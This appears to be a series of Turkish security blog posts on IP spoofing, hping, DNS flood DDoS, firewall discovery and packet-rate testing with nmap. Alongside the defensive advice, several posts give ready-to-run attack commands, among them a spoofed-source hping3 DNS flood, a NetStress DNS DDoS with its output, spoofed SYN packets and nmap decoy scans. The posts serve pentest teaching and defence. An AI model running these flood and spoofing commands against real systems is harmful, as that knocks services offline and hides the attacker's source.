Bu tamamlama özelliklerinden en önemli biri de IP katmanındaki adres sahteciliğine karşı Transport katmanında yer alan TCP’nin tahmin edilmesi güç sıra -onay numaraları barındırması özelliğidir.

IP Spoofing Nedir?

İstenilen IP adresinden TCP/IP paketleri (tcp, udp, ip, icmp, http, smtp, dns vb.) gönderebilme işlemine IP spoofing , ip sahteciliği denir. Sahte ip paketini alan taraf paketin gerçekten gönderilen ip adresinden gelip gelmediğini bilemez.

Genellikle internet dünyasında ip spoofing denildiğinde başkasının ip adresinden mail göndermek, bir foruma mesaj yazmak işlemleri gelmektedir. Bu tip işlemler teorik olarak mümkün olsa da günümüz internet dünyasında pratik olarak başkasının ip adresinden geliyormuş gibi mail gönderme, web sayfasına bağlanma işlemleri gerçekleştirilemez (*hedef ip adresinin çalıştığı sistem ele geçirilmeden)

IP Spoofing Uygulaması

IP spoofing yapabilmek için çeşitli ücretsiz/açık kaynak kod/ticari yazılımlar bulunmaktadır. Bunlar arasında en sık tercih edilenlerden birisi hping’dir. hping kullanarak istenilen özelliklerde ip paketi üretilebilir.

hping -a sahte_ip_adresi -p 80 -S www.bga.com.tr

komutuyla BGA.com.tr makinesinin 80. portuna TCP SYN paketi gönderilmektedir.

Popüler ağ keşif yazılımı Nmap’in Decoy Scan(-D) özelliği kullanılarak sahte ip adreslerinden port tarama gerçekleştirilebilir. Bu tarama tipinde aynı tarama 5, 10 (isteğe bağlı) farklı ip adresinden geliyormuş gibi gözükecektir. Tarama yapıyor gözüken ip adreslerinden bir tanesi de gerçek ip adresidir fakat hangisinin gerçek hangisinin sahte olduğu anlaşılamaz.

Günümüzde IP Spoofing Yapılabilir mi?

Teorik olarak IP spoofing tüm protokollerde gerçekleştirilebilir. Pratik olarak IP spoofing UDP kullanan uygulamalarda

gerçekleştirilebilirken TCP tabanlı uygulama seviyesi protokollerinde (HTTP, SMTP, FTP..) gerçekleştirilemez. Bunun temel nedeni TCP

başlık bilgisinde yer alan sıra numaralarının tahmin edilemez şekilde üretilmesidir. TCP, bağlantı kurulmadan önce her iki uç arasında üçlü el sıkışma işlemini tamamlamayı zorunlu kıldığı için bu aşamaları geçmeden iki uç arasında veri transferi normal yollardan gerçekleştirilemez.

TCP Başlık Değerleri

Transmission Control Protocol, Src Port: 51917 (51917), Dst Port: https (443), Seq: 1197810500, Ack: 1016160500, Len: 52
Source port: 51917 (51917)
Destination port: https (443)
[Stream index: 0]
Sequence number: 1197810500
[Next sequence number: 1197810552]
Acknowledgement number: 1016160500
Header length: 20 bytes
Flags: 0x18 (PSH, ACK)
000. …. …. = Reserved: Not set
…0 …. …. = Nonce: Not set
…. 0… …. = Congestion Window Reduced (CWR): Not set
…. .0.. …. = ECN-Echo: Not set
…. ..0. …. = Urgent: Not set
…. …1 …. = Acknowledgement: Set
…. …. 1… = Push: Set
…. …. .0.. = Reset: Not set
…. …. ..0. = Syn: Not set
…. …. …0 = Fin: Not set
Window size value: 15524
[Calculated window size: 15524]
[Window size scaling factor: -1 (unknown)]
Checksum: 0x4b0e [validation disabled]
[Good Checksum: False]
[Bad Checksum: False]
[SEQ/ACK analysis]
[This is an ACK to the segment in frame: 70]
[The RTT to ACK the segment was: 0.179202000 seconds]
[Bytes in flight: 52]
…

TCP tabanlı protokollerde sadece bağlantıyı başlatma istekleri (SYN bayraklı paketler) ve bağımsız TCP paketleri (FIN, ACK, PUSH bayrakları paketler) gönderilebilir.

IP Spoofing Nerelerde Kullanılmaktadır?

IP spoofing günümüz siber dünyasında yoğunlukla DDoS saldırılarında kullanılmaktadır. DDoS saldırılarının da statefull olmayan protokollerle gerçekleştirilen bölümünde geçerlidir. Yani HTTP GET flood sahte ip adreslerinden gerçekleştirilemez. Ama SYN flood, ACK flood, UDP Flood, DNS flood gibi saldırılar sahte ip adreslerindne gerçekleştirilebilir.

Bunun haricinde ip spoofing saldırıları UDP tabanlı protokollerdeki ip adresi sınırlamasını aşmak için de kullanılmaktadır.

IP Spoofing Nasıl Engellenebilir?

URPF kullanılarak ISP seviyesinde sistemlerin kendilerine atanan IP adresinden farklı bir IP adresini kullanarak paket göndermeleri engellenebilir.

Sahte IP adresi ile gelen paketleri paketlerin ulaştığı noktada engellenemez. Ancak Syn Proxy, Syn cookie gibi yöntemler kullanılarak TCP için üçlü el sıkışmayı tamamlamayı başaramayan paketlerin uç noktalardan iç noktalara(sunuculara, sistemlere) geçmesi engellenebilir.

Teknik Olarak IP Spoofing Detayları

TCP protokolünde bağlantı kurulmasında önce üçlü el sıkışması tamamlanmalıdır. Sahte bir IP adresi ile üçlü el sıkışmasının tamamlanabilmesi için TCP başlık bilgisinde yer alan 32 bitlik sıra numarası (ISN) tahmin edilebilir olması gerekmektedir. Günümüz işletim sistemlerinin hemen hepsinde bu değer yeteri kadar rastgele olacak şekilde üretilmektedir. Bu değerin tahmin edilebilir olması TCP kullanan uygulamalarda IP spoofing yapılabilir demektir.

Bir işletim sisteminin ürettiği sıra numaralarının tahmin edilebilir olup olmadığını anlamak için Wireshark, Hping gibi araçlar kullanılabilir. Hping doğrudan hedef sistemin ürettiği sıra numaralarının rastgeleliğini ölçmek için parametre barındırmaktadır (–seqnum)

Rastgele (random) ISN Değerleri Üreten İşletim Sistemi

Sol taraftaki sütun hedef sistemin ürettiği ISN(sıra numarası) değeridir. Sağ taraftaki sütun ise üretilen iki ISN arasındaki farktır. Eğer iki ISN arasındaki fark tahmin edilebilir bir değer ise hedef sisteme yönelik ip spoofing gerçekleştirilebilir demektir.

# hping –seqnum -S -p 80 www.microsoft.com -c 10
HPING www.microsoft.com (eth0 65.55.12.249): S set, 40 headers + 0 data bytes
1306812782 +1306812782
933497350 +3921651863
3318944478 +2385447128
300763979 +1276786796
496111299 +195347320
2835844375 +2339733076
630198047 +2089320967
1348279774 +718081727
3985307544 +2637027770
3677817908 +3987477659

Rastgele (random) ISN Değerleri Üretmeyen İşletim Sistemi

root@bt:~# hping3 –seqnum -p 80 -S 192.168.1.1 -c 50
HPING 192.168.1.1 (eth2 192.168.1.1): S set, 40 headers + 0 data bytes
4243283968 +4243283968
4247379968 +4096000
4251475968 +4096000
4255571968 +4096000
3988881408 +4028276735
4259667968 +270786560
4263682048 +4014080
4267778048 +4096000
4271915008 +4136960
4276011008 +4096000
4280066048 +4055040
3988881408 +4003782655
4284162048 +295280640
4288258048 +4096000
4292354048 +4096000
1482752 +4095999
5578752 +4096000
9633792 +4055040
3988881408 +3979247616
13729792 +319815679
17825792 +4096000
21921792 +4096000
26017792 +4096000
30113792 +4096000
34168832 +4055040
3988881408 +3954712576
38264832 +344350719
42360832 +4096000
46456832 +4096000
50470912 +4014080
54566912 +4096000
58662912 +4096000
3988881408 +3930218496
62758912 +368844799
66854912 +4096000
70950912 +4096000
75046912 +4096000
79101952 +4055040
83197952 +4096000
3988881408 +3905683456
87334912 +393420799
3988881408 +3901546496
3988881408 +0
91348992 +397434879
3988881408 +3897532416
95444992 +401530879
99540992 +4096000
103636992 +4096000
107732992 +4096000
111828992 +4096000

— 192.168.1.1 hping statistic —
41 packets tramitted, 50 packets received, -21% packet loss
round-trip min/avg/max = 1.3/2.7/6.9 ms

ISN değerlerini yeteri kadar rastgele üretmeyen ip adresinin hangi işletim sistemi üzerinde koştuğu bilgisi.

root@bt:~# nmap -O 192.168.1.1

Starting Nmap 5.51 ( http://nmap.org ) at 2011-11-02 08:00 EDT
Nmap scan report for 192.168.1.1
Host is up (0.037s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
80/tcp open http
8080/tcp filtered http-proxy
MAC Address: 00:23:F8:A:C:F (ZyXEL Communications)
Device type: firewall
Running: ZyXEL ZyNOS 3.X
OS details: ZyXEL ZyWALL 2 fire

The post Günümüz Internet Dünyasında IP Spoofing first appeared on Complexity is the enemy of Security.

DNS açısından güvenlik denildiğinde akla DNS kullanılarak gerçekleştirilen dns poisoning ve yönlendirme saldırıları ve erişilebilirliği hedef alan DDoS saldırıları gelmektedir. Özellikle DNS’e yönelik DDoS saldırıları son yıllarda ciddi oranda artış göstermektedir. DNS’in UDP üzerine bina edilmesi ve UDP üzerinden gerçekleştirilen iletişimde kaynak IP adresinin gerçek olup olmadığını anlamanın kesin bir yolunun olmaması saldırganın kendini gizleyerek saldırı gerçekleştirmesini kolaylaştırmaktadır.

DNS Flood DoS/DDoS Saldırıları

Bu saldırı tipinde genelde iki amaç vardır:

• Hedef DNS sunucuya kapasitesinin üzerinde (bant genişliği  olarak değil) DNS istekleri göndererek , normal isteklere cevap veremeyecek hale gelmesini sağlamak
• Hedef DNS sunucu önündeki Firewall/IPS’in “session” limitlerini zorlayarak Firewall arkasındaki tüm sistemlerin erişilemez olmasını sağlamak

Boş UDP/53 paketi ile DNS paketi arasındaki farklar

DNS Flood saldırılarında sık yapılan hatalardan biri de DP 53 portuna gönderilen her paketin DNS olduğunu düşünmektir. Bu şekilde gerçekleştirilecek DDoS denemeleri hedef sistem önündeki IPS ve benzeri sistemler tarafından protokol anormalliğine takılarak hedefe ulaşamayacaktır. UDP port 53’e gönderilen boş /dolu(dns olmayan içerik) ve DNS istekleri farklıdır. Hping gibi araçlar kullanılarak gerçekleştirilen udp port 53 flood saldırıları DNS flood saldırısı olarak adlandırılamaz.

Ancak DNS sorgularını ikili olarak kaydedip bunları Hping kullanarak hedefe dns sorgusu gibi gönderme işlemi yapılabilir.

Aşağıda adım adım Hping kullanarak nasıl DNS flood denemeleri gerçekleştirileceği anlatılmıştır. Test edilen her alan adı için bu şekilde dns sorgusu ikili dosya olarak kaydedilmeli ve hping’e parametre olarak verilmelidir.

Ardından seçili alanı binary olarak kaydedebiliriz.

Veya aşağıdaki şekilde doğrudan seçili pakete sağ tıklayarak ikili dosya olarak kaydedilmesi sağlanabilir.

Kaydedilen dosya www.bga.com.tr adresine ait  DNS sorgusunu içermektedir. Bu dosyayı hping3 kullanarak herhangi bir dns sunucusuna gönderip dns sorgusu olarak değerlendirilmesi sağlanabilir.

#hping3 –flood –rand-source –udp -p 53 dns_sunucu_ip_adresi -d 45 -E dns_bga.pcap

Hping ile DNS flood saldırılarının en önemli dezavantajı sadece bir alan adına yönelik sorgu gönderebilmesidir.

NetStress Kullanarak DNS DDoS Saldırısı Gerçekleştirme

BGA DDoS Pentest hizmetlerinde kullandığımız NetStress aracı ile saniyede 400.000-1.000.000 paket üretilebilir ve dns, udp ve ip paketine ait tüm alanlar TCP/IP protokolü özelliklerine göre isteğe bağlı olarak değiştirilebilir.

# ./netstress -d hedef_dns_ip_adresi -P 53 –attack dns -n 3 –buffer 35 –dnsqname dns.txt –dnsqtype A
^Croot@bt:~/netstress-2.0.4-dns#
———- netstress stats ———-
PPS: 133487
BPS: 8543168
MPS: 8.15
Total seconds active: 1
Total packets sent: 133487
————————————-

———- netstress stats ———-
PPS: 125066
BPS: 8004224
MPS: 7.63
Total seconds active: 1
Total packets sent: 125066
————————————-

———- netstress stats ———-
PPS: 133600
BPS: 8550400
MPS: 8.15
Total seconds active: 1
Total packets sent: 133600
————————————-

DNS Flood Saldırılarından Korunma

DNS, UDP üzerinden çalışan bir protokol olduğu için kesin bir engelleme yöntemi söz konusu değildir. Çeşitli güvenlik firmaları tarafından geliştirilen DDoS engelleme ürünlerinde DNS flood için bazı ayarlar olsa da bunlar ciddi saldırılarda genellikle işe yaramamaktadır. Bunun en temel sebebi DNS flood saldırılarında saldırganın istediği ip adresinden geliyormuş gibi saldırıyı gösterebilmesidir.

The post Hping Kullanarak DNS Flood DoS/DDoS Saldırıları Gerçekleştirme first appeared on Complexity is the enemy of Security.

The post DDoS Saldırıları, Korunma Yolları ve BotNet Sorunu Etkinliği Sunumları first appeared on Complexity is the enemy of Security.

Hping-1 Hping kullanarak TCP paketleriyle oynama

Hping-2 Hping ile IP, ICMP ve UDP paketleri Oluşturma

Benzer konudaki diğer belgelere http://www.guvenlikegitimleri.com/new/makaleler adresinden ulaşabilirsiniz.

The post Hping-III Hping ile ağ keşif çalışmaları first appeared on Complexity is the enemy of Security.

Mülakatta gelen ilk soru klasikti hangi araçları kullanacaksınız? Burada karşı tarafı etkileme amaçlı bir dünya araç ismi sayabilirdim fakat network testlerinde Hping, Nmap ve Netcat üçlüsü(+tcpdump) işimi fazlaca gördüğü için bunları saydım.

hping sihirli sözcük olmalı ki sorular onun üzerinden gelmeye devam etti. Neden hping, hping ile neler yapabilirsiniz vs…

Ben de her zamanki klasik cevabımı paylaştım: “Hping benim için aklımdakileri gerçekleştirmeme kolaylık sağlayan bir araç, iyi bir araç. Bunun ötesinde birşey değil…”

Neyse zaman geçtikce firmaya daha önce bu konuda yaptığım başarılı testleri vurucu örneklerle anlattım ve sanırım onları bu işte benimle çalışmalarına ikna ettim. Yapılacak iş aslında benim için yeni değil, üzerinde onlarca tür çeşitlilikte sistem çalışan ve tamamen TCP/IP konuşan bir networkün kapsamlı testi(klasik vulnerability testi değil). Sonuç olarak  benden beklenen altyapıda kullanılan ağ/güvenlik sistemlerinin hem işlevsellik hem de performans testlerinin yapılmasını ve test çıktılarının firmanın ağ ve güvenlik uzmanlarına detaylıca anlatılması.

Beni nerden buldunuz diye sorduğumda gelen cevaplardan anladığım Hping ile ilgili yazdıklarımın referans olmasıymış. hey gidi hping sen nelere kadirsin:). Bakalım gerekli izinleri vs halledebilirsem bir iki aylığına bu işe vereceğim kendimi. Sonrasında belki sadece bu yaptıklarımı anlatan bir eğitim bile açarız:)

The post Hping ile 50k$ kazanmak… first appeared on Complexity is the enemy of Security.

Penetrasyon testlerinin ilk ve en önemli adımı olan bilgi toplama kısmında pentest yapan kişi/firma öncelikle hedef ağın bir haritasını çıkarır. Bu harita test edilen ağın dışardan nasıl göründüğünü belirler aynı zamanda testi yapanların ne kadar işin ehli olduğunu belirlemeye de yarar.

Gerçi Türkiye’de yapılan pentestlerde firmalar IPS ve Firewall üzerinden full erişim istemekte ve aslında çok sağlam bulgulara yol açacak bu adım es geçilmekte. Çok sağlam bulgulardan kastım yapılan testlerde hedef sisteme sızma değil, hedef sistemin avaibility’sini sıkıntıya sokabilecek bulgular(birkaç yüz paketle 1-2Gblik hatta sahip olan bir sistemi DOS’a maruz bırakma vs gibi).

Evet günümüzde sık kullanılan bazı güvenlik sistemleri(Firewall/IPS/DDOS Engelleme)eğer dikkatli ayarlanmadıysa rahatlıkla DOS’a maruz bırakılabiliyor(DOS yapmak için 3-4 Mb hat yeterli oluyor). Bunlardan 4-5 tanesini bizzat çalışan sistemlerde firmaların izinlerini alarak test ettim ve sonuç tam manasıyla ürkütücü çıktı. Çeşitli saldırılardan korunmak üzere kurduğumuz  sistemlere karşı yapılacak akıllı saldırılar sonucu koruma sistemleri birden kılık değiştirerek tüm ağı engellemeye başlayabiliyor.

Nasıl’ı merak ediyorsanız Beyaz Şapkalı Hacker veya Uygulamalı TCP/IP Güvenliği eğitimlerinden birine kontenjanınızı ayırtmanızı öneririm.

Lafı bırakıp icraata geçelim: Amacımız hedef sistem önündeki Router ve Firewall’u keşfetme. IPS keşfini daha önce burada yazmaya çalışmıştım. 

Hedef sistem önünde bulunan firewallu keşfetme için öncelikle babadan kalma traceroute’u denemek gerekiyor ki buradan bir ekmek çıkmayacağını peşinen biliyoruz ama yine de ayıp olmasın diye ilk  adım olarak deniyoruz.

 # traceroute www.checkpoint.com
traceroute to www.checkpoint.com (216.200.241.66), 64 hops max, 40 byte packets
 1 ….
 2  …
 3  21.9.229.240 (212.98.229.240)  0.231 ms  0.243 ms  0.378 ms
 4  84.44.45.21 (84.44.45.21)  0.730 ms  0.589 ms  0.457 ms
 5  195.175.51.157 (195.175.51.157)  3.862 ms  17.334 ms  9.852 ms
 6  gayrettepe-t2-2-gayrettepe-t3-2.turktelekom.com.tr (212.156.118.241)  2.080 ms  94.674 ms  4.689 ms
 7  static.turktelekom.com.tr (212.156.103.33)  67.097 ms  56.423 ms  59.083 ms
 8  xe-11-1-0.edge3.London1.Level3.net (212.113.15.109)  67.160 ms  67.119 ms  67.198 ms
 9  ae-22-52.car2.London1.Level3.net (4.69.139.99)  68.780 ms
    ae-12-51.car2.London1.Level3.net (4.69.139.67)  68.719 ms  69.232 ms
10  ge-3-0-0.mpr1.lhr2.uk.above.net (208.185.188.185)  68.731 ms  68.871 ms  68.811 ms
11  ge-4-1-0.mpr1.lhr2.uk.above.net (64.125.27.145)  68.930 ms  69.333 ms  68.821 ms
12  so-1-1-0.mpr1.dca2.us.above.net (64.125.31.186)  133.635 ms  133.576 ms  135.907 ms
13  so-1-2-0.mpr1.lga5.us.above.net (64.125.26.102)  132.384 ms  132.603 ms  132.791 ms
14  xe-0-1-0.er1.lga5.us.above.net (64.125.27.61)  132.520 ms  133.093 ms  132.402 ms
15  xe-0-2-0.er1.sjc2.us.above.net (64.125.25.6)  215.351 ms  215.059 ms  215.109 ms
16  64.124.201.234 (64.124.201.234)  216.458 ms  216.444 ms  216.469 ms
17  * * *
18  * *^C
Görüleceği üzere klasik traceroute işimize yaramadı. Hedefe ulaşamadan aradaki sistemlerin ACL’lerine takıldı.

Hedef sistemin web sunucusu olduğunu bildiğimizden yöntem değiştirerek TCP paketlerini kullanarak trace çekmeyi deniyoruz. Burada amacımız Firewall arkasında olan web sunucuya 80. Porttan TCP SYN bayraklı paketler göndermek (her pakette TTL değerini bir düşürerek) ve dönecek cevaplara gore Router-Firewall-Web sunucu üçlüsünü bulmak.
Tcptraceroute için hping kullanıyoruz, isteyen aynı işi yapan tcptraceroute  programını da kullanabilir.

# hping -T -S -p 80 www.checkpoint.com -n
HPING www.checkpoint.com (em0 216.200.241.66): S set, 40 headers + 0 data bytes
hop=1 TTL 0 during transit from ….
hop=1 hoprtt=4.3 ms
hop=2 TTL 0 during transit from ip=….
hop=2 hoprtt=0.2 ms
hop=3 TTL 0 during transit from ip=212.98.229.240
hop=3 hoprtt=1.9 ms
hop=4 TTL 0 during transit from ip=84.44.45.21
hop=4 hoprtt=0.6 ms
hop=5 TTL 0 during transit from ip=195.175.51.157
hop=5 hoprtt=4.3 ms
hop=6 TTL 0 during transit from ip=212.156.118.241
hop=6 hoprtt=33.0 ms
hop=7 TTL 0 during transit from ip=212.156.103.33
hop=7 hoprtt=56.9 ms
hop=8 TTL 0 during transit from ip=212.113.15.109
hop=8 hoprtt=68.5 ms
hop=9 TTL 0 during transit from ip=4.69.139.99
hop=9 hoprtt=239.8 ms
hop=10 TTL 0 during transit from ip=208.185.188.185
hop=10 hoprtt=67.6 ms
hop=11 TTL 0 during transit from ip=64.125.27.145
hop=11 hoprtt=69.4 ms
hop=12 TTL 0 during transit from ip=64.125.31.186
hop=12 hoprtt=133.4 ms
hop=13 TTL 0 during transit from ip=64.125.26.102
hop=13 hoprtt=132.8 ms
hop=14 TTL 0 during transit from ip=64.125.27.61
hop=14 hoprtt=132.4 ms
hop=15 TTL 0 during transit from ip=64.125.25.6
hop=15 hoprtt=214.9 ms
hop=16 TTL 0 during transit from ip=64.124.201.234
hop=16 hoprtt=216.0 ms
hop=17 TTL 0 during transit from ip=216.200.160.5
hop=17 hoprtt=231.9 ms
len=46 ip=216.200.241.66 ttl=48 DF id=0 sport=80 flags=SA seq=17 win=5840 rtt=206.7 ms
len=46 ip=216.200.241.66 ttl=48 DF id=0 sport=80 flags=SA seq=18 win=5840 rtt=206.8 ms
len=46 ip=216.200.241.66 ttl=48 DF id=0 sport=80 flags=SA seq=19 win=5840 rtt=245.8 ms
^C
— www.checkpoint.com hping statistic —

ilk traceroute denemesinde son gördüğümüz ip adresi 64.124.201.234 idi. Tcptrace çekerek iki adım daha ileriye gidebildik.(-> 216.200.160.5 ve 216.200.241.66)

Burada web sunucudan bir önceki adımı -17.adım-(216.200.160.5) Firewall olarak düşünebiliriz(ya da benzeri işlev gören bir ağ cihazı). Bu bulgumuzu kesinleştirmek için aynı hedefe açık olmadığını düşündüğümüz bir porttan tekrar TCPtrace çekelim ve sonucunu inceleyelim.

#  hping -T -S -p 81 www.checkpoint.com  -n
HPING www.checkpoint.com (em0 216.200.241.66): S set, 40 headers + 0 data bytes
hop=1 TTL 0 during transit from ip=…
hop=1 hoprtt=0.7 ms
hop=2 TTL 0 during transit from ip=….
hop=2 hoprtt=0.3 ms
hop=3 TTL 0 during transit from ip=212.98.229.240
hop=3 hoprtt=0.2 ms
hop=4 TTL 0 during transit from ip=84.44.45.21
hop=4 hoprtt=0.5 ms
hop=5 TTL 0 during transit from ip=195.175.51.157
hop=5 hoprtt=8.2 ms
hop=6 TTL 0 during transit from ip=212.156.118.241
hop=6 hoprtt=57.7 ms
hop=7 TTL 0 during transit from ip=212.156.103.33
hop=7 hoprtt=59.5 ms
hop=8 TTL 0 during transit from ip=212.113.15.109
hop=8 hoprtt=67.1 ms
hop=9 TTL 0 during transit from ip=4.69.139.99
hop=9 hoprtt=67.5 ms
hop=10 TTL 0 during transit from ip=208.185.188.185
hop=10 hoprtt=67.4 ms
hop=11 TTL 0 during transit from ip=64.125.27.145
hop=11 hoprtt=69.1 ms
hop=12 TTL 0 during transit from ip=64.125.31.186
hop=12 hoprtt=133.6 ms
hop=13 TTL 0 during transit from ip=64.125.26.102
hop=13 hoprtt=132.5 ms
hop=14 TTL 0 during transit from ip=64.125.27.61
hop=14 hoprtt=132.3 ms
hop=15 TTL 0 during transit from ip=64.125.25.6
hop=15 hoprtt=215.2 ms
hop=16 TTL 0 during transit from ip=64.124.201.234
hop=16 hoprtt=216.2 ms
19: ^C
— www.checkpoint.com hping statistic —
51 packets tramitted, 16 packets re

çıktıdan görüleceği üzere 81. porta yaptığımız tcptrace çalışmasında 16. adımda takıldık. Bulgularımıza göre 16. adım Router, 17. adım Firewall idi. Firewall’a gelen TCP 81 ve TTL değeri 1 olan paket firewall kurallarında DROP olacağı için geriye TTL Expired mesajı dönmüyor ve biz 16.adımdan ileriye geçemiyoruz.

Firewall yanı zamanda NAT yapıyorsa…

Eğer firewall cihazı NAT yapıyorsa son iki adımın IP adresi aynı kalacaktır.

# hping -T -S -p 80 www.sirkett.com -n
HPING www.sirkett.com (em0 11.22.33.66): S set, 40 headers + 0 data bytes
hop=1 TTL 0 during transit from ip=212.98.228.241
hop=1 hoprtt=0.6 ms
hop=2 TTL 0 during transit from ip=62.244.216.145
hop=2 hoprtt=0.2 ms
hop=3 TTL 0 during transit from ip=212.98.229.240
hop=3 hoprtt=0.2 ms
hop=4 TTL 0 during transit from ip=84.44.45.21
hop=4 hoprtt=0.7 ms
hop=5 TTL 0 during transit from ip=92.44.45.1
hop=5 hoprtt=61.8 ms
hop=6 TTL 0 during transit from ip=85.29.56.38
hop=6 hoprtt=1.8 ms
hop=7 TTL 0 during transit from ip=85.29.5.30
hop=7 hoprtt=3.3 ms
hop=8 TTL 0 during transit from ip=85.29.5.54
hop=8 hoprtt=3.4 ms
hop=9 TTL 0 during transit from ip=85.29.5.4
hop=9 hoprtt=3.4 ms
hop=10 TTL 0 during transit from ip=11.22.33.66
hop=10 hoprtt=3.4 ms
len=46 ip=11.22.33.66 ttl=54 DF id=0 sport=80 flags=SA seq=10 win=5840 rtt=3.7 ms

Eğer hedef sistemin önünde Syncooki/synproxy destekleyen bir cihaz varsa tcptrace denemelerimiz başarılı sonuç vermeyecektir. Zira aradaki syncookie korumalı cihaz bizden gelen her SYN paketine kendisi cevap vereceği ve biz üçlü el sıkışmayı tamamlamadan arkasına paket geçirmeyeceği için Firewall cihazını keşfetme planımız TCP üzerinden suya düşecektir.

# hping -p 80 -S www.sirket1.com -n -T
HPING www.sirket1.com (bce1 11.22.33.44): S set, 40 headers + 0 data bytes
hop=1 TTL 0 during transit from ip=91.9.19.5
hop=1 hoprtt=27.2 ms
hop=2 TTL 0 during transit from ip=84.51.1.97
hop=2 hoprtt=2.6 ms
hop=3 TTL 0 during transit from ip=92.44.45.7
hop=3 hoprtt=4.8 ms
hop=4 TTL 0 during transit from ip=212.98.229.240
hop=4 hoprtt=3.4 ms
hop=5 TTL 0 during transit from ip=84.44.64.1
hop=5 hoprtt=4.8 ms
hop=6 TTL 0 during transit from ip=62.244.26.16
hop=6 hoprtt=30.7 ms
len=46 ip=11.22.33.44 ttl=58 DF id=21415 sport=80 flags=SA seq=6 win=0 rtt=6.4 ms
len=46 ip=11.22.33.44 ttl=58 DF id=21504 sport=80 flags=SA seq=7 win=0 rtt=8.4 ms
len=46 ip=11.22.33.44 ttl=58 DF id=21541 sport=80 flags=SA seq=8 win=0 rtt=5.9 ms

6. hoptan sonraki adımda doğrudan SYN-ACK cevapları gelmeye başlıyor. Bu cevapları gönderen 212.98.228.246 adresli cihaz aslında SYNProxy destekli bir system. Bunu aşabilsek arkadaki iki hopu da görebilecektik.

TCP üzerinden yapılacak keşif testlerinde ortamda eğer syncookie destekli bir cihaz varsa sonuçlar sağlıklı olmayacaktır ya da Firewall dışarı doğru ICMP mesajları göndermeye yetkili değilse yine testlerimiz başarısız olacaktır.

Bu gibi durumlarda hedef sistemin DNS sunucusu bulunup dns’e yönelik  udp port 53 üzerinden  trace çekme faydalı olabilir. Tabi ortamda birden fazla firewall vs varsa iş daha da karmaşıklaşacaktır. Sabırla çeşitli paketler göndererek hedef sistemi analiz etmek mutlaka size bir sonuca ulaştıracaktır.

The post Penetrasyon testlerinde firewall keşfi first appeared on Complexity is the enemy of Security.

Zaman zaman ağ/güvenlik sistemlerine test yaparken üretici firmaların şu tip istekleri olabiliyor:” saniyede 1000, 10000, 100.000 paket gönderebilir misiniz?”

Böylece test edilen cihazın, sistemin hangi aşamada sıkıntı yaşadığı rahatlıkla bulunabiliyor. Çeşitli protokoller için paket üretiminde genellikle Hping’i kullaniyorum fakat hping’in pps(packet per second) ayarlaması tam manasıyla çalışmıyor, ya da benim sistemlerinde verim alamıyorum. Hping yerine zaman zaman kullandığım iki aracı da deneyerek sonuçlarını paylaşayım istedim. Evet aşağıdaki üç araç ile istediğiniz protokolde, istediğiniz oranda paket üreterek sistemlerinizi test edebilirsiniz.(Bu siteye doğru yapmayin testlerinizi:)

Nmap ile saniyede istenilen değerde paket üretimi

Nmap’in –min-rate ve –max-rate seçenekleri bu işe yarar. Port tarama yaparken eş zamanlı ne kadar paket gönderebileceğinizi bu seçenekleri ayarlayarak belirleyebilirsiniz.

Mesela eş zamanlı olarak 10.000 paket göndererek 65.535 portu taramak isteyelim, sonuç aşağıdaki gibi olacaktır.

# time nmap –min-rate 10000 –max-rate 10001 localhost  -vvv -PN -p1-65535

Starting Nmap 4.90RC2 ( http://nmap.org ) at 2009-12-26 11:53 EST
Warning: Hostname localhost resolves to 2 IPs. Using 127.0.0.1.
Initiating SYN Stealth Scan at 11:53
Scanning localhost (127.0.0.1) [65535 ports]
Completed SYN Stealth Scan at 11:53, 6.49s elapsed (65535 total ports)
Host localhost (127.0.0.1) is up (0.0000030s latency).
Scanned at 2009-12-26 11:53:15 EST for 7s
Interesting ports on localhost (127.0.0.1):
Not shown: 65525 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
587/tcp  open  submission
953/tcp  open  rndc
5432/tcp open  postgresql
8118/tcp open  privoxy
9050/tcp open  tor-socks

Read data files from: /usr/local/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.61 seconds
           Raw packets sent: 65535 (2.884MB) | Rcvd: 131084 (5.506MB)

real    0m6.614s
user    0m0.116s
sys     0m0.012s

görüleceği üzere saniyede 10.000 paketten 6~saniye sürüyor 60.000 portu taramak, yani Nmap ile pps üretecimiz düzgün çalışıyor.

Aynı testi saniyede 1000 paket gönderecek şekilde ayarlarsak zaman da değişsecektir.

root@bt:~# time nmap –min-rate 1000 –max-rate 1001 localhost  -vvv -PN -p1-65535

Starting Nmap 4.90RC2 ( http://nmap.org ) at 2009-12-26 11:53 EST
Warning: Hostname localhost resolves to 2 IPs. Using 127.0.0.1.
Initiating SYN Stealth Scan at 11:53
Scanning localhost (127.0.0.1) [65535 ports]

Completed SYN Stealth Scan at 11:54, 65.47s elapsed (65535 total ports)
Host localhost (127.0.0.1) is up (0.0000040s latency).
Scanned at 2009-12-26 11:53:30 EST for 65s
Interesting ports on localhost (127.0.0.1):
Not shown: 65525 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
587/tcp  open  submission
953/tcp  open  rndc
5432/tcp open  postgresql
8118/tcp open  privoxy
9050/tcp open  tor-socks

Read data files from: /usr/local/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 65.59 seconds
           Raw packets sent: 65535 (2.884MB) | Rcvd: 131084 (5.506MB)

real    1m5.596s
user    0m0.120s
sys     0m0.000s

# time nmap –min-rate 30000 –max-rate 30000 localhost  -vvv -PN -p1-65535

Starting Nmap 4.90RC2 ( http://nmap.org ) at 2009-12-26 11:56 EST
Warning: Hostname localhost resolves to 2 IPs. Using 127.0.0.1.
Initiating SYN Stealth Scan at 11:56
Scanning localhost (127.0.0.1) [65535 ports]
Completed SYN Stealth Scan at 11:56, 2.59s elapsed (65535 total ports)
Host localhost (127.0.0.1) is up (0.0000080s latency).
Scanned at 2009-12-26 11:56:26 EST for 3s
Interesting ports on localhost (127.0.0.1):
Not shown: 65525 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
587/tcp  open  submission
953/tcp  open  rndc
5432/tcp open  postgresql
8118/tcp open  privoxy
9050/tcp open  tor-socks

Read data files from: /usr/local/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.71 seconds
           Raw packets sent: 65555 (2.884MB) | Rcvd: 131083 (5.506MB)

real    0m2.720s
user    0m0.476s
sys     0m0.948s

